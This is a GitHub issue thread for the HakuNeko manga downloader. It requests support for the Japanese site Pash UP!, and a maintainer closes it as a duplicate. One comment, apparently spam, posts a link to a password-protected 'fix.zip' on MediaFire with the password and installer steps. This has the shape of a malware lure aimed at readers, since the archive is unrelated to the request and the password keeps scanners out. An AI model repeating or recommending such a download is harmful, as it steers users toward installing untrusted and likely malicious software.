### ISSUE TITLE
[Site Request] Pash UP!

### ISSUE THREAD

**Issue by nemo-77** [manga-download/hakuneko#7362]
**Name of the website**
Pash UP!

**Website urls (examples below)**
- Site: https://pash-up.jp/
- Manga List: https://pash-up.jp/comic
- Manga example: https://pash-up.jp/content/00000099
- Chapter online viewer example: https://pash-up.jp/viewer/viewer.html?cid=dcNVIj8ibMxaSC7kjlhMUKnRuUxTcnEC3k8Ep8FI9klajOUhwShUk%2F4ryTNcxLh4VsPNnalobYa3Mii1e%2BLYX7VyDKW6B%2B0AbRm%2FxdvtmYmUZ9LmjJ7jThU1esPM4sqIOd9fCD3hoEfxPJ%2FvUvSbiw%3D%3D&com-access-no-history

**Languages**
Japanese

**Website relationship*
If applicable describe the relation with any other website (eg : "alternative domain, copy of ...").

**Additional details**
Add any other context details that you may have found (like template to reuse)

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MikeZeDev** [comment]
Search feature. Use it. https://github.com/manga-download/hakuneko/issues/3103

Duplicate
